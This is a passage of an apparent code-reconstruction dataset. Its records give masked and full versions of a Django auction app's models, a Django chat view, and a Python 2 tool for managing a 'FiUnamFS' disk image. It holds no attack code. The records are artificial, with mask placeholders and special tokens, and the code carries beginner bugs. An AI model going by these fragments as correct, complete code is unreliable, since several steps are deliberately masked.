cls.objects.filter(status_id=1).order_by('-end_time'\n ).reverse()\n return queryset\n except IndexError:\n return None\n\n @classmethod\n def getAuctionByID(cls, aucid):\n try:\n return cls.objects.get(id=aucid, status_id=1)\n except IndexError:\n return None\n\n @classmethod\n def getAuctionByCategory(cls, catid):\n try:\n prodcat = Product.objects.filter(product_category=catid)\n queryset = Auction.objects.filter(product_id=prodcat, status_id=1)\n return queryset\n except IndexError:\n return None\n\n @classmethod\n def getAuctionByOwner(cls, ownerid):\n try:\n myprod = Product.objects.filter(seller_id=ownerid)\n queryset = Auction.objects.filter(product_id=myprod, status_id=1)\n return queryset\n except IndexError:\n return None\n\n @classmethod\n def getOwnerByAuctionID(cls, aucid):\n try:\n queryset = Auction.objects.get(id=aucid, status_id=1)\n myprod = Product.objects.get(id=queryset.product_id)\n seller = myprod.seller\n return seller\n except IndexError:\n return None\n\n @classmethod\n def getAuctionByProductID(cls, product_id):\n try:\n queryset = Auction.objects.get(product=product_id, status_id=1)\n return queryset\n except IndexError:\n return None\n\n\nclass Bidder(models.Model):\n contender = models.ForeignKey(User, related_name='buyer', verbose_name=\n 'contender')\n auctions = models.ManyToManyField(Auction, related_name='auctions',\n through='AuctionBidder')\n version = IntegerVersionField()\n\n def __unicode__(self):\n return smart_unicode(self.contender)\n\n\n class Meta:\n ordering = ['contender']\n\n\nclass AuctionBidder(models.Model):\n unique_bidder = models.ForeignKey(Bidder, related_name='unique_bidder')\n auc = models.ForeignKey(Auction, related_name='unique_auction')\n bid_amount = models.DecimalField(max_digits=10, decimal_places=2,\n verbose_name='bid amount')\n bid_time = models.DateTimeField(auto_now_add=False, auto_now=timezone.now()\n )\n version = IntegerVersionField()\n\n def __unicode__(self):\n return smart_unicode(self.auc)\n\n\n class Meta:\n ordering = ['bid_time']\n",
"step-4": "from django.db import models\nfrom django.contrib.auth.models import User\nfrom django.utils.encoding import smart_unicode\nfrom django.core.validators import MinValueValidator\nfrom django.utils import timezone\nfrom concurrency.fields import IntegerVersionField\n\n\nclass ProductCategory(models.Model):\n name = models.CharField(max_length=20)\n\n\n class Meta:\n unique_together = 'name',\n\n def __unicode__(self):\n return smart_unicode(self.name)\n\n\nclass Product(models.Model):\n name = models.CharField(max_length=20)\n seller = models.ForeignKey(User, verbose_name='seller')\n initial_price = models.DecimalField(max_digits=10, decimal_places=2,\n validators=[MinValueValidator(0)], verbose_name='starting bid')\n description = models.TextField(max_length=280)\n timestamp = models.DateTimeField(auto_now_add=timezone.now(), auto_now=\n False)\n product_category = models.ForeignKey(ProductCategory, verbose_name=\n 'product category')\n version = IntegerVersionField()\n\n def __unicode__(self):\n return smart_unicode(self.name)\n\n\nclass AuctionStatus(models.Model):\n name = models.CharField(max_length=20)\n version = IntegerVersionField()\n\n\n class Meta:\n unique_together = 'name',\n\n def __unicode__(self):\n return smart_unicode(self.name)\n\n\nclass Auction(models.Model):\n title = models.CharField(max_length=20)\n current_price = models.DecimalField(max_digits=10, decimal_places=2,\n default=0, null=True, blank=True, verbose_name='current bid')\n updated_time = models.DateTimeField(auto_now_add=False, auto_now=\n timezone.now())\n end_time = models.DateTimeField(verbose_name='end time')\n product = models.OneToOneField(Product, related_name='product')\n status = models.ForeignKey(AuctionStatus, verbose_name='auction status')\n version = IntegerVersionField()\n\n\n class Meta:\n unique_together = 'title',\n ordering = ['end_time']\n\n def __unicode__(self):\n return smart_unicode(self.title)\n\n @classmethod\n def fetchActiveAuctions(cls):\n try:\n queryset = cls.objects.filter(status_id=1).order_by('-end_time'\n ).reverse()\n return queryset\n except IndexError:\n return None\n\n @classmethod\n def getAuctionByID(cls, aucid):\n try:\n return cls.objects.get(id=aucid, status_id=1)\n except IndexError:\n return None\n\n @classmethod\n def getAuctionByCategory(cls, catid):\n try:\n prodcat = Product.objects.filter(product_category=catid)\n queryset = Auction.objects.filter(product_id=prodcat, status_id=1)\n return queryset\n except IndexError:\n return None\n\n @classmethod\n def getAuctionByOwner(cls, ownerid):\n try:\n myprod = Product.objects.filter(seller_id=ownerid)\n queryset = Auction.objects.filter(product_id=myprod, status_id=1)\n return queryset\n except IndexError:\n return None\n\n @classmethod\n def getOwnerByAuctionID(cls, aucid):\n try:\n queryset = Auction.objects.get(id=aucid, status_id=1)\n myprod = Product.objects.get(id=queryset.product_id)\n seller = myprod.seller\n return seller\n except IndexError:\n return None\n\n @classmethod\n def getAuctionByProductID(cls, product_id):\n try:\n queryset = Auction.objects.get(product=product_id, status_id=1)\n return queryset\n except IndexError:\n return None\n\n\nclass Bidder(models.Model):\n contender = models.ForeignKey(User, related_name='buyer', verbose_name=\n 'contender')\n auctions = models.ManyToManyField(Auction, related_name='auctions',\n through='AuctionBidder')\n version = IntegerVersionField()\n\n def __unicode__(self):\n return smart_unicode(self.contender)\n\n\n class Meta:\n ordering = ['contender']\n\n\nclass AuctionBidder(models.Model):\n unique_bidder = models.ForeignKey(Bidder, related_name='unique_bidder')\n auc = models.ForeignKey(Auction, related_name='unique_auction')\n bid_amount = models.DecimalField(max_digits=10, decimal_places=2,\n verbose_name='bid amount')\n bid_time = models.DateTimeField(auto_now_add=False, auto_now=timezone.now()\n )\n version = IntegerVersionField()\n\n def __unicode__(self):\n return smart_unicode(self.auc)\n\n\n class Meta:\n ordering = ['bid_time']\n",
"step-5": "from django.db import models\nfrom django.contrib.auth.models import User\nfrom django.utils.encoding import smart_unicode\nfrom django.core.validators import MinValueValidator\nfrom django.utils import timezone\nfrom concurrency.fields import IntegerVersionField\n\n\nclass ProductCategory(models.Model):\n name = models.CharField(max_length=20)\n\n class Meta:\n unique_together = ((\"name\"),)\n\n def __unicode__(self):\n return smart_unicode(self.name)\n\n\nclass Product(models.Model):\n name = models.CharField(max_length=20)\n seller = models.ForeignKey(User, verbose_name=\"seller\")\n initial_price = models.DecimalField(max_digits=10, decimal_places=2,\n validators=[MinValueValidator(0)], verbose_name=\"starting bid\")\n description = models.TextField(max_length=280)\n timestamp = models.DateTimeField(auto_now_add=timezone.now(), auto_now=False)\n product_category = models.ForeignKey(ProductCategory, verbose_name=\"product category\")\n version = IntegerVersionField()\n\n def __unicode__(self):\n return smart_unicode(self.name)\n\n\nclass AuctionStatus(models.Model):\n name = models.CharField(max_length=20)\n version = IntegerVersionField()\n\n class Meta:\n unique_together = ((\"name\"),)\n\n def __unicode__(self):\n return smart_unicode(self.name)\n\n\nclass Auction(models.Model):\n title = models.CharField(max_length=20)\n current_price = models.DecimalField(max_digits=10, decimal_places=2, default=0,\n null=True, blank=True, verbose_name=\"current bid\")\n updated_time = models.DateTimeField(auto_now_add=False, auto_now=timezone.now())\n end_time = models.DateTimeField(verbose_name=\"end time\")\n product = models.OneToOneField(Product, related_name='product')\n status = models.ForeignKey(AuctionStatus, verbose_name=\"auction status\")\n version = IntegerVersionField()\n\n class Meta:\n unique_together = ((\"title\"),)\n ordering = ['end_time']\n\n def __unicode__(self):\n return smart_unicode(self.title)\n\n\n @classmethod\n def fetchActiveAuctions(cls):\n try:\n queryset = cls.objects.filter(status_id=1).order_by('-end_time').reverse()\n return queryset\n except IndexError:\n return None\n\n @classmethod\n def getAuctionByID(cls, aucid):\n try:\n return cls.objects.get(id=aucid, status_id=1)\n except IndexError:\n return None\n\n @classmethod\n def getAuctionByCategory(cls, catid):\n try:\n prodcat = Product.objects.filter(product_category=catid)\n queryset = Auction.objects.filter(product_id=prodcat, status_id=1)\n return queryset\n except IndexError:\n return None\n\n @classmethod\n def getAuctionByOwner(cls, ownerid):\n try:\n myprod = Product.objects.filter(seller_id=ownerid)\n queryset = Auction.objects.filter(product_id=myprod, status_id=1)\n return queryset\n except IndexError:\n return None\n\n @classmethod\n def getOwnerByAuctionID(cls, aucid):\n try:\n queryset = Auction.objects.get(id=aucid, status_id=1)\n myprod = Product.objects.get(id=queryset.product_id)\n seller = myprod.seller\n return seller\n except IndexError:\n return None\n\n @classmethod\n def getAuctionByProductID(cls, product_id):\n try:\n queryset = Auction.objects.get(product=product_id, status_id=1)\n return queryset\n except IndexError:\n return None\n\n\nclass Bidder(models.Model):\n contender = models.ForeignKey(User, related_name='buyer', verbose_name='contender')\n auctions = models.ManyToManyField(Auction, related_name='auctions', through='AuctionBidder')\n version = IntegerVersionField()\n\n def __unicode__(self):\n return smart_unicode(self.contender)\n\n class Meta:\n ordering = [\"contender\"]\n\n\nclass AuctionBidder(models.Model):\n unique_bidder = models.ForeignKey(Bidder, related_name='unique_bidder')\n auc = models.ForeignKey(Auction, related_name='unique_auction')\n bid_amount = models.DecimalField(max_digits=10, decimal_places=2,\n verbose_name=\"bid amount\")\n bid_time = models.DateTimeField(auto_now_add=False, auto_now=timezone.now(), )\n version = IntegerVersionField()\n\n def __unicode__(self):\n return smart_unicode(self.auc)\n\n class Meta:\n ordering = [\"bid_time\"]\n\n\n\n\n",
"step-ids": [
15,
20,
23,
25,
26
]
}
|
[
15,
20,
23,
25,
26
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def chat(request):
chat_list = Chat.objects.order_by('id_chat')
chat_dict = {'chat': chat_list}
return render(request, 'chats/Chat.html', context=chat_dict)
<|reserved_special_token_1|>
from django.shortcuts import render
from django.http import HttpResponse
from chats.models import Chat
from usuario.models import Usuario
def chat(request):
chat_list = Chat.objects.order_by('id_chat')
chat_dict = {'chat': chat_list}
return render(request, 'chats/Chat.html', context=chat_dict)
<|reserved_special_token_1|>
from django.shortcuts import render
from django.http import HttpResponse
from chats.models import Chat
from usuario.models import Usuario
# Create your views here.
def chat(request):
chat_list = Chat.objects.order_by("id_chat")
chat_dict = {'chat': chat_list}
return render(request,'chats/Chat.html', context=chat_dict)
|
flexible
|
{
"blob_id": "4a14265a9a2338be66e31110bba696e224b6a70f",
"index": 8395,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef chat(request):\n chat_list = Chat.objects.order_by('id_chat')\n chat_dict = {'chat': chat_list}\n return render(request, 'chats/Chat.html', context=chat_dict)\n",
"step-3": "from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom chats.models import Chat\nfrom usuario.models import Usuario\n\n\ndef chat(request):\n chat_list = Chat.objects.order_by('id_chat')\n chat_dict = {'chat': chat_list}\n return render(request, 'chats/Chat.html', context=chat_dict)\n",
"step-4": "from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom chats.models import Chat\nfrom usuario.models import Usuario\n\n# Create your views here.\ndef chat(request):\n \n chat_list = Chat.objects.order_by(\"id_chat\")\n chat_dict = {'chat': chat_list}\n\n return render(request,'chats/Chat.html', context=chat_dict)",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from sys import exit
from os import stat
file = open("fiunamfs.img","r")
nombre = file.read(8)
file.seek(10)
version = file.read(3)
file.seek(20)
etiqueta = file.read(15)
file.seek(40)
cluster = file.read(5)
file.seek(47)
numero = file.read(2)
file.seek(52)
numeroCompleto = file.read(8)
file.close()
archivos = []
tams = []
clusters = []
def clusterVacio():
arreAux = []
busca = 1
bandera = True
for i in range(len(clusters)):
clu=clusters[i]
arreAux.append(int(clu[0]))
print(arreAux)
while bandera:
if busca in arreAux:
busca = busca + 1
else:
bandera = False
return busca
def tablaArchivos():
global archivos
global tams
global clusters
archivos = []
tams = []
clusters = []
file = open("fiunamfs.img","r+")
file.seek(2048)
for i in range(64):
archivos.append(file.read(15))
tams.append(file.read(8))
clusters.append(file.read(5))
file.seek(file.tell()+36)
file.close()
def info():
print("Nombre del Sistema: " + nombre)
print("Version: " + version)
print("Etiqueta del Volumen: " + etiqueta)
print("Tamano del cluster en bytes: " + cluster)
print("Numero de clusters que mide el directorio: " + numero)
print("Numero de cluster que mide la unidad completa: " + numeroCompleto)
def listar():
file = open("fiunamfs.img","r")
file.seek(2048)
for i in range(64):
name = file.read(15)
if name != 'Xx.xXx.xXx.xXx.':
print(name)
file.seek(file.tell()+49)
file.close()
def borrar(archivo):
borrado = False
file = open("fiunamfs.img","r+")
file.seek(2048)
for i in range(64):
name = file.read(15)
aux = name.strip()
if aux == archivo:
file.seek(file.tell()-15)
file.write('Xx.xXx.xXx.xXx.')
borrado = True
file.seek(file.tell()+49)
file.close()
return borrado
def tamaArchivo(path):
si = stat(path).st_size
return si
def dePcASistema(path, nombre):
posicion =0
actual =0
try:
new = open(path,"r+")
file = open("fiunamfs.img","r+")
file.seek(2048)
bandera = False
tam = stat(path).st_size
while(bandera == False):
name = file.read(15)
if (name == 'Xx.xXx.xXx.xXx.'):
file.seek(file.tell()-15)
file.write(nombre)
actual = file.tell()
print("El archivo fue copiado")
bandera = True
file.seek(file.tell()+49)
file.close()
file = open("fiunamfs.img","r+")
pa = clusterVacio()
inde = 2048*pa
tamano = tamaArchivo(path)
file.seek(inde)
file.write(new.read(tamano))
file.close()
file = open("fiunamfs.img","r+")
file.seek(actual)
file.write(str(pa))
file.close()
except:
print("Este archivo no existe")
def deSistemaAPc(archivo,nombre):
tam = 0
clu = 0
file = open("fiunamfs.img","r") #Se abre el archivo en modo solo lectura
file.seek(2048) #Se salta el superbloque
new = open(archivo,"r+")
for i in range(64):
name = file.read(15)
aux = name.strip()
if (aux == nombre):
tam = file.read(8)
clu = file.read(5)
file.close()
aux2 = 2048*clu
file = open("fiunamfs.img","r")
file.seek(aux2)
new.write(file.read(tam))
def nombreArchivo(path):
tam = len(path)
slash = 0
name = ''
name2 = ''
for i in range(tam):
if (path[i] == '/'):
slash = i
for i in range(slash+1,tam):
name = name + path[i]
##Agregar funcion de limiar nombres de los archivos a 15 caracteres
espaces = 15 - len(name)
for i in range (espaces):
name2 = name2 + " "
return name2 + name
if (nombre == "FiUnamFS" and version == "0.7"):
correcto = True
while(correcto):
tablaArchivos()
print("Sistema de Archivos FI Unam FS")
print("1: Listar")
print("2: Copiar archivo")
print("3: Copiar archivo a la computadora")
print("4: Eliminar archivo")
print("5: Desgramentar")
print("6: Mostar informacion del sistema de archivos")
print("7: Salir")
opcion = input("Opcion: ")
if opcion == 6:
info()
elif opcion == 1:
listar()
elif opcion == 4:
archivo = raw_input("Nombre del archivo a borrar: ")
if(borrar(archivo)):
print('El archivo fue borrado')
else:
print('No se encontro el archivo')
elif opcion == 3:
archivo = raw_input("Nombre del archivo a copiar: ")
nombre = nombreArchivo(archivo)
deSistemaAPc(archivo, nombre)
elif opcion == 2:
archivo = raw_input("Nombre del archivo a copiar: ")
nombre = nombreArchivo(archivo)
dePcASistema(archivo, nombre)
elif opcion == 9:
print(archivos)
print(clusters)
print(tams)
elif opcion == 8:
va = clusterVacio()
print (va)
elif opcion == 7:
print("Sistema desmontado")
correcto = False
elif opcion == 5:
print("No se implemento")
else:
print("No se puede abrir el sistema de archivos debido a que no es el archivo correcto o la version correcta. Revise nuevamente que tenga la imagen correcta.")
exit()
|
normal
|
{
"blob_id": "da69fd937153fe2112b9f64411882527274247ef",
"index": 1878,
"step-1": "<mask token>\n\n\ndef clusterVacio():\n arreAux = []\n busca = 1\n bandera = True\n for i in range(len(clusters)):\n clu = clusters[i]\n arreAux.append(int(clu[0]))\n print(arreAux)\n while bandera:\n if busca in arreAux:\n busca = busca + 1\n else:\n bandera = False\n return busca\n\n\ndef tablaArchivos():\n global archivos\n global tams\n global clusters\n archivos = []\n tams = []\n clusters = []\n file = open('fiunamfs.img', 'r+')\n file.seek(2048)\n for i in range(64):\n archivos.append(file.read(15))\n tams.append(file.read(8))\n clusters.append(file.read(5))\n file.seek(file.tell() + 36)\n file.close()\n\n\ndef info():\n print('Nombre del Sistema: ' + nombre)\n print('Version: ' + version)\n print('Etiqueta del Volumen: ' + etiqueta)\n print('Tamano del cluster en bytes: ' + cluster)\n print('Numero de clusters que mide el directorio: ' + numero)\n print('Numero de cluster que mide la unidad completa: ' + numeroCompleto)\n\n\ndef listar():\n file = open('fiunamfs.img', 'r')\n file.seek(2048)\n for i in range(64):\n name = file.read(15)\n if name != 'Xx.xXx.xXx.xXx.':\n print(name)\n file.seek(file.tell() + 49)\n file.close()\n\n\ndef borrar(archivo):\n borrado = False\n file = open('fiunamfs.img', 'r+')\n file.seek(2048)\n for i in range(64):\n name = file.read(15)\n aux = name.strip()\n if aux == archivo:\n file.seek(file.tell() - 15)\n file.write('Xx.xXx.xXx.xXx.')\n borrado = True\n file.seek(file.tell() + 49)\n file.close()\n return borrado\n\n\ndef tamaArchivo(path):\n si = stat(path).st_size\n return si\n\n\n<mask token>\n\n\ndef deSistemaAPc(archivo, nombre):\n tam = 0\n clu = 0\n file = open('fiunamfs.img', 'r')\n file.seek(2048)\n new = open(archivo, 'r+')\n for i in range(64):\n name = file.read(15)\n aux = name.strip()\n if aux == nombre:\n tam = file.read(8)\n clu = file.read(5)\n file.close()\n aux2 = 2048 * clu\n file = open('fiunamfs.img', 'r')\n file.seek(aux2)\n new.write(file.read(tam))\n\n\ndef nombreArchivo(path):\n tam = len(path)\n slash = 0\n name = ''\n name2 = ''\n for i in range(tam):\n if path[i] == '/':\n slash = i\n for i in range(slash + 1, tam):\n name = name + path[i]\n espaces = 15 - len(name)\n for i in range(espaces):\n name2 = name2 + ' '\n return name2 + name\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef clusterVacio():\n arreAux = []\n busca = 1\n bandera = True\n for i in range(len(clusters)):\n clu = clusters[i]\n arreAux.append(int(clu[0]))\n print(arreAux)\n while bandera:\n if busca in arreAux:\n busca = busca + 1\n else:\n bandera = False\n return busca\n\n\ndef tablaArchivos():\n global archivos\n global tams\n global clusters\n archivos = []\n tams = []\n clusters = []\n file = open('fiunamfs.img', 'r+')\n file.seek(2048)\n for i in range(64):\n archivos.append(file.read(15))\n tams.append(file.read(8))\n clusters.append(file.read(5))\n file.seek(file.tell() + 36)\n file.close()\n\n\ndef info():\n print('Nombre del Sistema: ' + nombre)\n print('Version: ' + version)\n print('Etiqueta del Volumen: ' + etiqueta)\n print('Tamano del cluster en bytes: ' + cluster)\n print('Numero de clusters que mide el directorio: ' + numero)\n print('Numero de cluster que mide la unidad completa: ' + numeroCompleto)\n\n\ndef listar():\n file = open('fiunamfs.img', 'r')\n file.seek(2048)\n for i in range(64):\n name = file.read(15)\n if name != 'Xx.xXx.xXx.xXx.':\n print(name)\n file.seek(file.tell() + 49)\n file.close()\n\n\ndef borrar(archivo):\n borrado = False\n file = open('fiunamfs.img', 'r+')\n file.seek(2048)\n for i in range(64):\n name = file.read(15)\n aux = name.strip()\n if aux == archivo:\n file.seek(file.tell() - 15)\n file.write('Xx.xXx.xXx.xXx.')\n borrado = True\n file.seek(file.tell() + 49)\n file.close()\n return borrado\n\n\ndef tamaArchivo(path):\n si = stat(path).st_size\n return si\n\n\ndef dePcASistema(path, nombre):\n posicion = 0\n actual = 0\n try:\n new = open(path, 'r+')\n file = open('fiunamfs.img', 'r+')\n file.seek(2048)\n bandera = False\n tam = stat(path).st_size\n while bandera == False:\n name = file.read(15)\n if name == 'Xx.xXx.xXx.xXx.':\n file.seek(file.tell() - 15)\n file.write(nombre)\n actual = file.tell()\n print('El archivo fue copiado')\n bandera = True\n file.seek(file.tell() + 49)\n file.close()\n file = open('fiunamfs.img', 'r+')\n pa = clusterVacio()\n inde = 2048 * pa\n tamano = tamaArchivo(path)\n file.seek(inde)\n file.write(new.read(tamano))\n file.close()\n file = open('fiunamfs.img', 'r+')\n file.seek(actual)\n file.write(str(pa))\n file.close()\n except:\n print('Este archivo no existe')\n\n\ndef deSistemaAPc(archivo, nombre):\n tam = 0\n clu = 0\n file = open('fiunamfs.img', 'r')\n file.seek(2048)\n new = open(archivo, 'r+')\n for i in range(64):\n name = file.read(15)\n aux = name.strip()\n if aux == nombre:\n tam = file.read(8)\n clu = file.read(5)\n file.close()\n aux2 = 2048 * clu\n file = open('fiunamfs.img', 'r')\n file.seek(aux2)\n new.write(file.read(tam))\n\n\ndef nombreArchivo(path):\n tam = len(path)\n slash = 0\n name = ''\n name2 = ''\n for i in range(tam):\n if path[i] == '/':\n slash = i\n for i in range(slash + 1, tam):\n name = name + path[i]\n espaces = 15 - len(name)\n for i in range(espaces):\n name2 = name2 + ' '\n return name2 + name\n\n\n<mask token>\n",
"step-3": "<mask token>\nfile.seek(10)\n<mask token>\nfile.seek(20)\n<mask token>\nfile.seek(40)\n<mask token>\nfile.seek(47)\n<mask token>\nfile.seek(52)\n<mask token>\nfile.close()\n<mask token>\n\n\ndef clusterVacio():\n arreAux = []\n busca = 1\n bandera = True\n for i in range(len(clusters)):\n clu = clusters[i]\n arreAux.append(int(clu[0]))\n print(arreAux)\n while bandera:\n if busca in arreAux:\n busca = busca + 1\n else:\n bandera = False\n return busca\n\n\ndef tablaArchivos():\n global archivos\n global tams\n global clusters\n archivos = []\n tams = []\n clusters = []\n file = open('fiunamfs.img', 'r+')\n file.seek(2048)\n for i in range(64):\n archivos.append(file.read(15))\n tams.append(file.read(8))\n clusters.append(file.read(5))\n file.seek(file.tell() + 36)\n file.close()\n\n\ndef info():\n print('Nombre del Sistema: ' + nombre)\n print('Version: ' + version)\n print('Etiqueta del Volumen: ' + etiqueta)\n print('Tamano del cluster en bytes: ' + cluster)\n print('Numero de clusters que mide el directorio: ' + numero)\n print('Numero de cluster que mide la unidad completa: ' + numeroCompleto)\n\n\ndef listar():\n file = open('fiunamfs.img', 'r')\n file.seek(2048)\n for i in range(64):\n name = file.read(15)\n if name != 'Xx.xXx.xXx.xXx.':\n print(name)\n file.seek(file.tell() + 49)\n file.close()\n\n\ndef borrar(archivo):\n borrado = False\n file = open('fiunamfs.img', 'r+')\n file.seek(2048)\n for i in range(64):\n name = file.read(15)\n aux = name.strip()\n if aux == archivo:\n file.seek(file.tell() - 15)\n file.write('Xx.xXx.xXx.xXx.')\n borrado = True\n file.seek(file.tell() + 49)\n file.close()\n return borrado\n\n\ndef tamaArchivo(path):\n si = stat(path).st_size\n return si\n\n\ndef dePcASistema(path, nombre):\n posicion = 0\n actual = 0\n try:\n new = open(path, 'r+')\n file = open('fiunamfs.img', 'r+')\n file.seek(2048)\n bandera = False\n tam = stat(path).st_size\n while bandera == False:\n name = file.read(15)\n if name == 'Xx.xXx.xXx.xXx.':\n file.seek(file.tell() - 15)\n file.write(nombre)\n actual = file.tell()\n print('El archivo fue copiado')\n bandera = True\n file.seek(file.tell() + 49)\n file.close()\n file = open('fiunamfs.img', 'r+')\n pa = clusterVacio()\n inde = 2048 * pa\n tamano = tamaArchivo(path)\n file.seek(inde)\n file.write(new.read(tamano))\n file.close()\n file = open('fiunamfs.img', 'r+')\n file.seek(actual)\n file.write(str(pa))\n file.close()\n except:\n print('Este archivo no existe')\n\n\ndef deSistemaAPc(archivo, nombre):\n tam = 0\n clu = 0\n file = open('fiunamfs.img', 'r')\n file.seek(2048)\n new = open(archivo, 'r+')\n for i in range(64):\n name = file.read(15)\n aux = name.strip()\n if aux == nombre:\n tam = file.read(8)\n clu = file.read(5)\n file.close()\n aux2 = 2048 * clu\n file = open('fiunamfs.img', 'r')\n file.seek(aux2)\n new.write(file.read(tam))\n\n\ndef nombreArchivo(path):\n tam = len(path)\n slash = 0\n name = ''\n name2 = ''\n for i in range(tam):\n if path[i] == '/':\n slash = i\n for i in range(slash + 1, tam):\n name = name + path[i]\n espaces = 15 - len(name)\n for i in range(espaces):\n name2 = name2 + ' '\n return name2 + name\n\n\nif nombre == 'FiUnamFS' and version == '0.7':\n correcto = True\n while correcto:\n tablaArchivos()\n print('Sistema de Archivos FI Unam FS')\n print('1: Listar')\n print('2: Copiar archivo')\n print('3: Copiar archivo a la computadora')\n print('4: Eliminar archivo')\n print('5: Desgramentar')\n print('6: Mostar informacion del sistema de archivos')\n print('7: Salir')\n opcion = input('Opcion: ')\n if opcion == 6:\n info()\n elif opcion == 1:\n listar()\n elif opcion == 4:\n archivo = raw_input('Nombre del archivo a borrar: ')\n if borrar(archivo):\n print('El archivo fue borrado')\n else:\n print('No se encontro el archivo')\n elif opcion == 3:\n archivo = raw_input('Nombre del archivo a copiar: ')\n nombre = nombreArchivo(archivo)\n deSistemaAPc(archivo, nombre)\n elif opcion == 2:\n archivo = raw_input('Nombre del archivo a copiar: ')\n nombre = nombreArchivo(archivo)\n dePcASistema(archivo, nombre)\n elif opcion == 9:\n print(archivos)\n print(clusters)\n print(tams)\n elif opcion == 8:\n va = clusterVacio()\n print(va)\n elif opcion == 7:\n print('Sistema desmontado')\n correcto = False\n elif opcion == 5:\n print('No se implemento')\nelse:\n print(\n 'No se puede abrir el sistema de archivos debido a que no es el archivo correcto o la version correcta. Revise nuevamente que tenga la imagen correcta.'\n )\n exit()\n",
"step-4": "from sys import exit\nfrom os import stat\nfile = open('fiunamfs.img', 'r')\nnombre = file.read(8)\nfile.seek(10)\nversion = file.read(3)\nfile.seek(20)\netiqueta = file.read(15)\nfile.seek(40)\ncluster = file.read(5)\nfile.seek(47)\nnumero = file.read(2)\nfile.seek(52)\nnumeroCompleto = file.read(8)\nfile.close()\narchivos = []\ntams = []\nclusters = []\n\n\ndef clusterVacio():\n arreAux = []\n busca = 1\n bandera = True\n for i in range(len(clusters)):\n clu = clusters[i]\n arreAux.append(int(clu[0]))\n print(arreAux)\n while bandera:\n if busca in arreAux:\n busca = busca + 1\n else:\n bandera = False\n return busca\n\n\ndef tablaArchivos():\n global archivos\n global tams\n global clusters\n archivos = []\n tams = []\n clusters = []\n file = open('fiunamfs.img', 'r+')\n file.seek(2048)\n for i in range(64):\n archivos.append(file.read(15))\n tams.append(file.read(8))\n clusters.append(file.read(5))\n file.seek(file.tell() + 36)\n file.close()\n\n\ndef info():\n print('Nombre del Sistema: ' + nombre)\n print('Version: ' + version)\n print('Etiqueta del Volumen: ' + etiqueta)\n print('Tamano del cluster en bytes: ' + cluster)\n print('Numero de clusters que mide el directorio: ' + numero)\n print('Numero de cluster que mide la unidad completa: ' + numeroCompleto)\n\n\ndef listar():\n file = open('fiunamfs.img', 'r')\n file.seek(2048)\n for i in range(64):\n name = file.read(15)\n if name != 'Xx.xXx.xXx.xXx.':\n print(name)\n file.seek(file.tell() + 49)\n file.close()\n\n\ndef borrar(archivo):\n borrado = False\n file = open('fiunamfs.img', 'r+')\n file.seek(2048)\n for i in range(64):\n name = file.read(15)\n aux = name.strip()\n if aux == archivo:\n file.seek(file.tell() - 15)\n file.write('Xx.xXx.xXx.xXx.')\n borrado = True\n file.seek(file.tell() + 49)\n file.close()\n return borrado\n\n\ndef tamaArchivo(path):\n si = stat(path).st_size\n return si\n\n\ndef dePcASistema(path, nombre):\n posicion = 0\n actual = 0\n try:\n new = open(path, 'r+')\n file = open('fiunamfs.img', 'r+')\n file.seek(2048)\n bandera = False\n tam = stat(path).st_size\n while bandera == False:\n name = file.read(15)\n if name == 'Xx.xXx.xXx.xXx.':\n file.seek(file.tell() - 15)\n file.write(nombre)\n actual = file.tell()\n print('El archivo fue copiado')\n bandera = True\n file.seek(file.tell() + 49)\n file.close()\n file = open('fiunamfs.img', 'r+')\n pa = clusterVacio()\n inde = 2048 * pa\n tamano = tamaArchivo(path)\n file.seek(inde)\n file.write(new.read(tamano))\n file.close()\n file = open('fiunamfs.img', 'r+')\n file.seek(actual)\n file.write(str(pa))\n file.close()\n except:\n print('Este archivo no existe')\n\n\ndef deSistemaAPc(archivo, nombre):\n tam = 0\n clu = 0\n file = open('fiunamfs.img', 'r')\n file.seek(2048)\n new = open(archivo, 'r+')\n for i in range(64):\n name = file.read(15)\n aux = name.strip()\n if aux == nombre:\n tam = file.read(8)\n clu = file.read(5)\n file.close()\n aux2 = 2048 * clu\n file = open('fiunamfs.img', 'r')\n file.seek(aux2)\n new.write(file.read(tam))\n\n\ndef nombreArchivo(path):\n tam = len(path)\n slash = 0\n name = ''\n name2 = ''\n for i in range(tam):\n if path[i] == '/':\n slash = i\n for i in range(slash + 1, tam):\n name = name + path[i]\n espaces = 15 - len(name)\n for i in range(espaces):\n name2 = name2 + ' '\n return name2 + name\n\n\nif nombre == 'FiUnamFS' and version == '0.7':\n correcto = True\n while correcto:\n tablaArchivos()\n print('Sistema de Archivos FI Unam FS')\n print('1: Listar')\n print('2: Copiar archivo')\n print('3: Copiar archivo a la computadora')\n print('4: Eliminar archivo')\n print('5: Desgramentar')\n print('6: Mostar informacion del sistema de archivos')\n print('7: Salir')\n opcion = input('Opcion: ')\n if opcion == 6:\n info()\n elif opcion == 1:\n listar()\n elif opcion == 4:\n archivo = raw_input('Nombre del archivo a borrar: ')\n if borrar(archivo):\n print('El archivo fue borrado')\n else:\n print('No se encontro el archivo')\n elif opcion == 3:\n archivo = raw_input('Nombre del archivo a copiar: ')\n nombre = nombreArchivo(archivo)\n deSistemaAPc(archivo, nombre)\n elif opcion == 2:\n archivo = raw_input('Nombre del archivo a copiar: ')\n nombre = nombreArchivo(archivo)\n dePcASistema(archivo, nombre)\n elif opcion == 9:\n print(archivos)\n print(clusters)\n print(tams)\n elif opcion == 8:\n va = clusterVacio()\n print(va)\n elif opcion == 7:\n print('Sistema desmontado')\n correcto = False\n elif opcion == 5:\n print('No se implemento')\nelse:\n print(\n 'No se puede abrir el sistema de archivos debido a que no es el archivo correcto o la version correcta. Revise nuevamente que tenga la imagen correcta.'\n )\n exit()\n",
